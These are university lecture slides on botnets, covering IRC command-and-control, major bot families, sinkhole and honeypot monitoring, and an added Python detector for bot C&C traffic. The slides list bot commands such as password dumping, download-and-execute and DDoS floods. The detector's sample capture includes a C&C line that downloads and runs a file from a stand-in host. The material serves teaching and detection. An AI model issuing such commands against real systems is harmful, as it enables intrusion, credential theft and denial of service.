CIS3360: Security in Computing
Chapter 4.3: Botnets
Cliff Zou
Spring 2012
Acknowledgement
- This lecture uses some content from the lecture notes of:
  - Dr. Dawn Song: CS161: Computer Security
  - Richard Wang, SophosLabs: The Development of Botnets
  - Randy Marchany, VA Tech IT Security Lab: Botnets
Botnets
- Collection of compromised hosts
- Spread like worms and viruses
- Once installed, respond to remote commands
- A network of 'bots'
  - robot: an automatic machine that can be programmed to perform specific tasks
- Also known as 'zombies'
- Platform for many attacks
  - Spam forwarding (70% of all spam?)
  - Click fraud
  - Keystroke logging
  - Distributed denial of service attacks
- Serious problem
  - Top concern of banks, online merchants
  - Vint Cerf: ¼ of hosts connected to the Internet
What are botnets used for?

IRC (Internet Relay Chat) based Control
Why IRC?
- IRC servers are:
  - freely available
  - easy to manage
  - easy to subvert
- Attackers have experience with IRC
- IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts
How bad is the problem?
- Symantec identified a 400K-node botnet
- A network administrator in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections
  - Phatbot harvests MyDoom- and Bagle-infected machines
- Researchers at Georgia Tech monitored thousands of botnets
Spreading Problem
- The spreading mechanism is a leading cause of background noise
  - Ports 445, 135, 139 and 137 accounted for 80% of the traffic captured by the German Honeynet Project
- Other ports
  - 2745: Bagle backdoor
  - 3127: MyDoom backdoor
  - 3410: Optix trojan backdoor
  - 5000: UPnP vulnerability
Most commonly used Bot families
- Agobot
- SDBot
- SpyBot
- GT Bot
Agobot
- Most sophisticated
- 20,000 lines of C/C++ code
- IRC-based command/control
- Large collection of target exploits
- Capable of many DoS attack types
- Shell encoding/polymorphic obfuscation
- Traffic sniffers/key logging
- Defends/fortifies the compromised system
- Ability to frustrate disassembly
SDBot
- Simpler than Agobot, 2,000 lines of C code
- Non-malicious at base
- Uses IRC-based command/control
- Easily extended for malicious purposes
  - Scanning
  - DoS attacks
  - Sniffers
  - Information harvesting
  - Encryption
SpyBot
- <3,000 lines of C code
- Possibly evolved from SDBot
- Similar command/control engine
- No attempts to hide malicious purposes
GT Bot
- Functions based on mIRC scripting capabilities
- HideWindow program hides the bot on the local system
- Basic rootkit function
- Port scanning, DoS attacks, exploits for RPC and NetBIOS
- Variance in codebase size, structure, complexity, implementation
- Convergence in set of functions
  - Possibility for defense systems effective across bot families
- Bot families extensible
  - Agobot likely to become dominant
- All of the above use IRC for command/control
  - Disrupt IRC, disable bots
  - Sniff IRC traffic for commands
  - Shut down channels used for botnets
  - IRC operators play a central role in stopping botnet traffic
  - But a botnet could use its own IRC server
  - Automated traffic identification required
- Future botnets may move away from IRC
  - Move to P2P communication
  - Traffic fingerprinting still useful for identification
Control
Host control
- Fortify the system against other malicious attacks
  - Disable anti-virus software
- Harvest sensitive information
  - PayPal, software keys, etc.
  - Economic incentives for botnets
- Stresses the need to patch/protect systems prior to attack
- Stronger protection boundaries required across applications in OSes
Example Botnet Commands
- Connection
  - CLIENT: PASS <password>
  - HOST: (if error, disconnect)
  - CLIENT: NICK <nick>
  - HOST: NICKERROR | CONNECTED
- Pass hierarchy info
  - BOTINFO <nick> <connected_to> <priority>
  - BOTQUIT <nick>
- IRC commands
  - CHANJOIN <tag> <channel>
  - CHANPART <tag> <channel>
  - CHANOP <tag> <channel>
  - CHANKICK <tag> <channel>
  - CHANBANNED <tag> <channel>
  - CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>
- pstore
  - Display all usernames/passwords stored in browsers of infected systems
- bot.execute
  - Run an executable on the remote system
- bot.open
  - Read a file on the remote computer
- bot.command
  - Run a command with system()
- http.execute
  - Download and execute a file through HTTP
- ftp.execute
  - Download and execute a file through FTP
- ddos.udpflood
- ddos.synflood
- ddos.phaticmp
- redirect.http
- redirect.socks
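The earlier slide on disrupting IRC-based control calls for sniffing IRC traffic for commands and for automated traffic identification, and the command slides above give the vocabulary to look for. The following detector is an added example, not code from the lecture or from any bot family: it scans constructed capture lines for that vocabulary and for the PASS/NICK handshake and reports which IRC conversations look like C&C. The capture line format, the addresses and the nicknames are assumptions.

```python
"""Heuristic IRC C&C detector (added example; not the lecture's code).

Scans captured IRC lines for the bot-command vocabulary listed on the
slides and for the PASS/NICK bot handshake, and reports which IRC
conversations look like botnet command-and-control. Detection only.
"""
import re
from collections import defaultdict

# Command vocabulary taken from the "Example Botnet Commands" slides.
BOT_COMMANDS = {
    "pstore", "bot.execute", "bot.open", "bot.command",
    "http.execute", "ftp.execute",
    "ddos.udpflood", "ddos.synflood", "ddos.phaticmp",
    "redirect.http", "redirect.socks",
}
# Hierarchy / channel-management commands exchanged between bot and host.
HIERARCHY_COMMANDS = {
    "BOTINFO", "BOTQUIT", "CHANJOIN", "CHANPART", "CHANOP",
    "CHANKICK", "CHANBANNED", "CHANPRIORITY",
}

# Assumed capture format (constructed): "<src_ip> <dst_ip> <irc line>"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
PRIVMSG_RE = re.compile(r"^(?::\S+\s+)?PRIVMSG\s+\S+\s+:(.*)$")


def classify_payload(payload):
    """Return a reason string if the IRC line looks like C&C, else None."""
    words = payload.split()
    if not words:
        return None
    m = PRIVMSG_RE.match(payload)
    if m:
        text = m.group(1).split()
        # Bots commonly prefix commands in channel messages with '.' or '!'.
        first = text[0].lstrip(".!") if text else ""
        if first in BOT_COMMANDS:
            return "bot command: " + first
        if first in HIERARCHY_COMMANDS:
            return "hierarchy command: " + first
        return None
    if words[0] in HIERARCHY_COMMANDS:
        return "hierarchy command: " + words[0]
    return None


def scan_capture(lines):
    """Group lines into conversations (unordered IP pair) and flag those
    carrying at least one bot or hierarchy command; the handshake verbs
    seen (PASS/NICK) are reported alongside as supporting evidence."""
    convs = defaultdict(lambda: {"handshake": set(), "reasons": []})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines not in the assumed capture format
        src, dst, payload = m.groups()
        conv = convs[tuple(sorted((src, dst)))]
        words = payload.split()
        if words and words[0] in ("PASS", "NICK"):
            conv["handshake"].add(words[0])
        reason = classify_payload(payload)
        if reason:
            conv["reasons"].append(reason)
    return {pair: info for pair, info in convs.items() if info["reasons"]}


# Constructed sample capture (documentation addresses; not real traffic).
SAMPLE_CAPTURE = [
    "10.0.0.7 203.0.113.5 PASS s3cr3t",
    "10.0.0.7 203.0.113.5 NICK bot-7a2f",
    "10.0.0.7 203.0.113.5 JOIN #chan",
    "203.0.113.5 10.0.0.7 :master!m@cc PRIVMSG #chan :.http.execute http://cc1.example/upd.exe",
    "203.0.113.5 10.0.0.7 :master!m@cc PRIVMSG #chan :.ddos.udpflood <target> <port> <secs>",
    "10.0.0.8 192.0.2.40 NICK alice",
    "10.0.0.8 192.0.2.40 PRIVMSG #linux :anyone tried the new kernel?",
]

if __name__ == "__main__":
    for pair, info in scan_capture(SAMPLE_CAPTURE).items():
        print(pair, sorted(info["handshake"]), info["reasons"])
```

A real deployment would feed the same logic from a packet capture and would add the traffic-fingerprinting features the slide mentions (timing, message sizes), since a botnet on its own IRC server can rename every command.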
Current Botnet Control Architecture
[Figure: a botmaster controlling several C&C servers, each serving its own group of bots]
- More than one C&C server
- Spread all around the world
Botnet Monitor: Gatech KarstNet
[Figure: bots, attacker, C&C servers reached through the name cc1.com, and the KarstNet sinkhole]
- A lot of bots use a Dyn-DNS name to find the C&C
- KarstNet informs the DNS provider of cc1.com
  - Detect cc1.com by its abnormal DNS queries
- The DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
- All/most bots attempt to connect to the sinkhole
Botnet Monitor: Honeypot Spy
- Security researchers set up honeypots
  - Honeypots: deliberately vulnerable machines
  - When compromised, closely monitor the malware's behavior
  - Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
- When a compromised honeypot joins a botnet
  - Passive monitoring: log all network traffic
  - Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional C&C, etc.)
- Representative research paper:
  - Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose and Andreas Terzis. A multifaceted approach to understanding the botnet phenomenon. 6th ACM SIGCOMM Conference on Internet Measurement (IMC), 2006.
The Future Generation of Botnets
- Peer-to-Peer C&C
- Polymorphism
- Anti-honeypot
- Rootkit techniques

